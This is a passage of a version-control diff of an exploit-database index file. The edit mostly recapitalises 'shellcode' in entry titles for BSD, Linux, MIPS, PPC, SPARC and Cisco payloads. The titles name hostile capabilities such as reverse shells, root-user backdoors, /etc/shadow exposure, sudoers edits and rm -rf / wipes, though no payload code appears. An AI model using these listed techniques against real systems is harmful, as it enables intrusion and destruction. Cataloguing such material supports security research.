bytes)",2004-09-26,duke,bsdi_x86,shellcode,0 +13258,platforms/bsdi_x86/shellcode/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0 40087,platforms/multiple/dos/40087.txt,"Adobe Flash - ATF Processing Overflow",2016-07-11,"Google Security Research",multiple,dos,0 40088,platforms/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double Free",2016-07-11,"Google Security Research",multiple,dos,0 40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0 @@ -11740,362 +11740,362 @@ id,file,description,date,author,platform,type,port 40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80 40095,platforms/multiple/dos/40095.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (1)",2016-07-13,COSIG,multiple,dos,0 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 - Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 -13260,platforms/bsdi_x86/shellcode/13260.c,"BSDi/x86 - execve /bin/sh toupper evasion shellcode (97 bytes)",2004-09-26,anonymous,bsdi_x86,shellcode,0 -13261,platforms/freebsd/shellcode/13261.txt,"FreeBSD i386 & AMD64 - Execve /bin/sh shellcode (Anti-Debugging) (140 bytes)",2009-04-13,c0d3_z3r0,freebsd,shellcode,0 -13262,platforms/freebsd_x86/shellcode/13262.txt,"FreeBSD/x86 - setreuid_ execve(pfctl -d) shellcode (56 bytes)",2008-09-12,suN8Hclf,freebsd_x86,shellcode,0 -13263,platforms/freebsd_x86/shellcode/13263.txt,"FreeBSD/x86 - connect back.send.exit /etc/passwd shellcode (112 bytes)",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0 -13264,platforms/freebsd_x86/shellcode/13264.txt,"FreeBSD/x86 - kill all processes shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0 -13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - rev connect_ recv_ jmp_ return results shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0 +13260,platforms/bsdi_x86/shellcode/13260.c,"BSDi/x86 - execve /bin/sh toupper evasion Shellcode (97 bytes)",2004-09-26,anonymous,bsdi_x86,shellcode,0 +13261,platforms/freebsd/shellcode/13261.txt,"FreeBSD i386 & AMD64 - Execve /bin/sh Shellcode (Anti-Debugging) (140 bytes)",2009-04-13,c0d3_z3r0,freebsd,shellcode,0 +13262,platforms/freebsd_x86/shellcode/13262.txt,"FreeBSD/x86 - setreuid_ execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,freebsd_x86,shellcode,0 +13263,platforms/freebsd_x86/shellcode/13263.txt,"FreeBSD/x86 - connect back.send.exit /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0 +13264,platforms/freebsd_x86/shellcode/13264.txt,"FreeBSD/x86 - kill all processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0 +13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - rev connect_ recv_ jmp_ return results Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0 13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - /bin/cat /etc/master.passwd Null Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0 -13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - reverse portbind 127.0.0.1:8000 /bin/sh shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 -13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); execve(ipf -Fa); shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 -13269,platforms/freebsd_x86/shellcode/13269.c,"FreeBSD/x86 - encrypted shellcode /bin/sh (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0 -13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - portbind 4883 with auth shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0 +13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - reverse portbind 127.0.0.1:8000 /bin/sh Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 +13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 +13269,platforms/freebsd_x86/shellcode/13269.c,"FreeBSD/x86 - encrypted Shellcode /bin/sh (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0 +13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - portbind 4883 with auth Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0 13271,platforms/freebsd_x86/shellcode/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,freebsd_x86,shellcode,0 -13272,platforms/freebsd_x86/shellcode/13272.c,"FreeBSD/x86 - execve /bin/sh shellcode (23 bytes)",2006-04-14,IZ,freebsd_x86,shellcode,0 -13273,platforms/freebsd_x86/shellcode/13273.c,"FreeBSD/x86 - execve /bin/sh shellcode (2) (23 bytes)",2004-09-26,marcetam,freebsd_x86,shellcode,0 -13274,platforms/freebsd_x86/shellcode/13274.c,"FreeBSD/x86 - execve /bin/sh shellcode (37 bytes)",2004-09-26,preedator,freebsd_x86,shellcode,0 -13275,platforms/freebsd_x86/shellcode/13275.c,"FreeBSD/x86 - kldload /tmp/o.o shellcode (74 bytes)",2004-09-26,dev0id,freebsd_x86,shellcode,0 -13276,platforms/freebsd_x86/shellcode/13276.c,"FreeBSD/x86 - chown 0:0 _ chmod 6755 & execve /tmp/sh shellcode (44 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 -13277,platforms/freebsd_x86/shellcode/13277.c,"FreeBSD/x86 - execve /tmp/sh shellcode (34 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 -13278,platforms/freebsd_x86/shellcode/13278.asm,"FreeBSD/x86 - connect (Port 31337) shellcode (102 bytes)",2004-09-26,Scrippie,freebsd_x86,shellcode,0 -13279,platforms/freebsd_x86-64/shellcode/13279.c,"FreeBSD/x86-64 - exec(_/bin/sh_) shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0 -13280,platforms/freebsd_x86-64/shellcode/13280.c,"FreeBSD/x86-64 - execve /bin/sh shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0 -13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null Free shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0 -13282,platforms/generator/shellcode/13282.php,"Linux/x86 - portbind payload shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 -13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - portbind payload shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 -13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic shellcode with printable ASCII characters",2008-08-31,sorrow,generator,shellcode,0 -13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null Free shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0 +13272,platforms/freebsd_x86/shellcode/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-04-14,IZ,freebsd_x86,shellcode,0 +13273,platforms/freebsd_x86/shellcode/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (2) (23 bytes)",2004-09-26,marcetam,freebsd_x86,shellcode,0 +13274,platforms/freebsd_x86/shellcode/13274.c,"FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes)",2004-09-26,preedator,freebsd_x86,shellcode,0 +13275,platforms/freebsd_x86/shellcode/13275.c,"FreeBSD/x86 - kldload /tmp/o.o Shellcode (74 bytes)",2004-09-26,dev0id,freebsd_x86,shellcode,0 +13276,platforms/freebsd_x86/shellcode/13276.c,"FreeBSD/x86 - chown 0:0 _ chmod 6755 & execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 +13277,platforms/freebsd_x86/shellcode/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 +13278,platforms/freebsd_x86/shellcode/13278.asm,"FreeBSD/x86 - connect (Port 31337) Shellcode (102 bytes)",2004-09-26,Scrippie,freebsd_x86,shellcode,0 +13279,platforms/freebsd_x86-64/shellcode/13279.c,"FreeBSD/x86-64 - exec(_/bin/sh_) Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0 +13280,platforms/freebsd_x86-64/shellcode/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0 +13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0 +13282,platforms/generator/shellcode/13282.php,"Linux/x86 - portbind payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 +13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - portbind payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 +13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic Shellcode with printable ASCII characters",2008-08-31,sorrow,generator,shellcode,0 +13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0 13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode Encoder/Decoder",2008-08-04,"Avri Schneider",generator,shellcode,0 -13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x requests shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0 +13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0 13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Shellcode Encoding Tool (Generator)",2005-12-16,Skylined,generator,shellcode,0 13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent shellcode",2008-08-21,"Andy Davis",ios,shellcode,0 13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback (Port 21) Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Shellcode Password Protected (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - Tiny Shellcode (New TTY_ Privilege level to 15_ No password)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 -13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0 -13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - flush iptables rules shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0 -13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - connect-back semi-stealth shellcode (88+ bytes)",2006-04-21,phar,lin_x86-64,shellcode,0 -13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - 4919 port bind shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 -13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 -13300,platforms/linux_mips/shellcode/13300.c,"Linux/MIPS - execve /bin/sh shellcode (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0 -13301,platforms/linux_ppc/shellcode/13301.c,"Linux/PPC - execve /bin/sh shellcode (60 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 -13302,platforms/linux_ppc/shellcode/13302.c,"Linux/PPC - read & exec shellcode (32 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 -13303,platforms/linux_ppc/shellcode/13303.c,"Linux/PPC - connect back (192.168.1.1:31337) execve /bin/sh shellcode (240 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 -13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0 -13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0 -13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - portbind port 8975 shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0 -13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-modifying shellcode for IDS evasion (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 -13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on port 8800/TCP shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 -13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens for shellcode on 5555/TCP and jumps to it (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0 -13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Polymorphic shellcode disable Network Card (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0 -13311,platforms/lin_x86/shellcode/13311.c,"Linux/x86 - killall5 polymorphic shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 -13312,platforms/lin_x86/shellcode/13312.c,"Linux/x86 - /bin/sh polymorphic shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 +13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0 +13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - flush iptables rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0 +13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - connect-back semi-stealth Shellcode (88+ bytes)",2006-04-21,phar,lin_x86-64,shellcode,0 +13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - 4919 port bind Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 +13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 +13300,platforms/linux_mips/shellcode/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0 +13301,platforms/linux_ppc/shellcode/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 +13302,platforms/linux_ppc/shellcode/13302.c,"Linux/PPC - read & exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 +13303,platforms/linux_ppc/shellcode/13303.c,"Linux/PPC - connect back (192.168.1.1:31337) execve /bin/sh Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 +13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0 +13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0 +13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - portbind port 8975 Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0 +13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-modifying Shellcode for IDS evasion (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 +13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on port 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 +13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens for Shellcode on 5555/TCP and jumps to it (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0 +13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Polymorphic Shellcode disable Network Card (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0 +13311,platforms/lin_x86/shellcode/13311.c,"Linux/x86 - killall5 polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 +13312,platforms/lin_x86/shellcode/13312.c,"Linux/x86 - /bin/sh polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 13313,platforms/lin_x86/shellcode/13313.c,"Linux/x86 - 4444 Port Binding Shellcode (xor-encoded) (152 bytes)",2009-07-10,Rick,lin_x86,shellcode,0 -13314,platforms/lin_x86/shellcode/13314.c,"Linux/x86 - reboot() polymorphic shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",lin_x86,shellcode,0 +13314,platforms/lin_x86/shellcode/13314.c,"Linux/x86 - reboot() polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",lin_x86,shellcode,0 13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - Polymorphic chmod(_/etc/shadow__666) Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0 -13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0 -13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - bindport 8000 & execve iptables -F shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - bindport 8000 & add user with root access shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - 8000 Bind Port ASM Code Linux shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0 -13320,platforms/lin_x86/shellcode/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) shellcode (49 bytes)",2009-05-14,evil.xi4oyu,lin_x86,shellcode,0 -13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial port shell binding & busybox Launching shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0 -13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File unlinker shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 -13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl script execution shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 -13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - file reader shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0 -13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod(_/etc/shadow__666) & exit(0) shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0 -13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0 -13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0 -13328,platforms/lin_x86/shellcode/13328.c,"Linux/x86 - shellcode obfuscator",2008-12-09,sm4x,lin_x86,shellcode,0 -13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - connect-back port UDP/54321 live packet capture shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 -13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - append rsa key to /root/.ssh/authorized_keys2 shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 -13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0 -13332,platforms/lin_x86/shellcode/13332.c,"Linux/x86 - Ho' Detector - Promiscuous mode detector shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0 -13333,platforms/lin_x86/shellcode/13333.txt,"Linux/x86 - setuid(0) & execve(/bin/sh_0_0) shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0 -13334,platforms/lin_x86/shellcode/13334.txt,"Linux/x86 - setresuid(0_0_0) /bin/sh shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0 -13335,platforms/lin_x86/shellcode/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} shellcode (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0 -13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - system-beep shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0 -13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - Connect back (140.115.53.35:9999)_ download a file (cb) and execute shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0 -13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0 -13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - connect back (Port )8192.send.exit /etc/shadow shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0 -13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - writes a php connectback shell (/var/www/cb.php) to the filesystem shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0 -13341,platforms/lin_x86/shellcode/13341.c,"Linux/x86 - rm -rf / attempts to block the process from being stopped shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode,0 -13342,platforms/lin_x86/shellcode/13342.c,"Linux/x86 - setuid(0) . setgid(0) . aslr_off shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0 -13343,platforms/lin_x86/shellcode/13343.asm,"Linux/x86 - raw-socket ICMP/checksum shell shellcode (235 bytes)",2007-04-02,mu-b,lin_x86,shellcode,0 -13344,platforms/lin_x86/shellcode/13344.c,"Linux/x86 - /sbin/iptables -F shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 -13345,platforms/lin_x86/shellcode/13345.c,"Linux/x86 - kill all processes shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 -13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0 -13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - /sbin/ipchains -F shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - set system time to 0 and exit shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add root user 'r00t' with no password to /etc/passwd shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13350,platforms/lin_x86/shellcode/13350.c,"Linux/x86 - chmod 0666 /etc/shadow shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13351,platforms/lin_x86/shellcode/13351.c,"Linux/x86 - forkbomb shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13353,platforms/lin_x86/shellcode/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) shellcode (28 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 -13354,platforms/lin_x86/shellcode/13354.c,"Linux/x86 - execve(/bin/sh) shellcode (22 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 -13355,platforms/lin_x86/shellcode/13355.c,"Linux/x86 - HTTP/1.x GET_ Downloads and execve() shellcode (111+ bytes)",2006-10-22,izik,lin_x86,shellcode,0 -13356,platforms/lin_x86/shellcode/13356.c,"Linux/x86 - executes command after setreuid shellcode (49+ bytes)",2006-08-02,bunker,lin_x86,shellcode,0 -13357,platforms/lin_x86/shellcode/13357.c,"Linux/x86 - stdin re-open and /bin/sh exec shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 -13358,platforms/lin_x86/shellcode/13358.c,"Linux/x86 - re-use of /bin/sh string in .rodata shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 -13359,platforms/lin_x86/shellcode/13359.c,"Linux/x86 - setuid(0) and /bin/sh execve() shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 -13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - setuid/portbind (Port 31337) shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 -13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - portbind (2707) shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0 +13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0 +13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - bindport 8000 & execve iptables -F Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 +13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - bindport 8000 & add user with root access Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 +13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - 8000 Bind Port ASM Code Linux Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0 +13320,platforms/lin_x86/shellcode/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,lin_x86,shellcode,0 +13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial port shell binding & busybox Launching Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0 +13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 +13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl script execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 +13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - file reader Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0 +13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod(_/etc/shadow__666) & exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0 +13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0 +13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0 +13328,platforms/lin_x86/shellcode/13328.c,"Linux/x86 - Shellcode obfuscator",2008-12-09,sm4x,lin_x86,shellcode,0 +13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - connect-back port UDP/54321 live packet capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 +13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - append rsa key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 +13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0 +13332,platforms/lin_x86/shellcode/13332.c,"Linux/x86 - Ho' Detector - Promiscuous mode detector Shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0 +13333,platforms/lin_x86/shellcode/13333.txt,"Linux/x86 - setuid(0) & execve(/bin/sh_0_0) Shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0 +13334,platforms/lin_x86/shellcode/13334.txt,"Linux/x86 - setresuid(0_0_0) /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0 +13335,platforms/lin_x86/shellcode/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0 +13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - system-beep Shellcode 